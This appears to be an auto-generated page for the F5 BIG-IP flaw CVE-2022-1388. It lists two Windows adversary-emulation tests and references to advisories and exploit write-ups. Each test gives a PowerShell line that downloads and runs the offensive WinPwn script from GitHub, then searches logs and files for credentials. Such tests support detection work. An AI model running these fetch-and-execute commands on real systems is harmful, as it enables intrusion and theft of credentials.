T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (7)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2022-1388
support.f5.com
GitHub CVE
https://support.f5.com/csp/article/K23605346
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/167118/F5-BIG-IP-16.0.x-Remote-Code-Execution.html
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/167150/F5-BIG-IP-iControl-Remote-Code-Execution.html
secpod.com
GitHub CVE
https://www.secpod.com/blog/critical-f5-big-ip-remote-code-execution-vulnerability-patch-now/
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-1388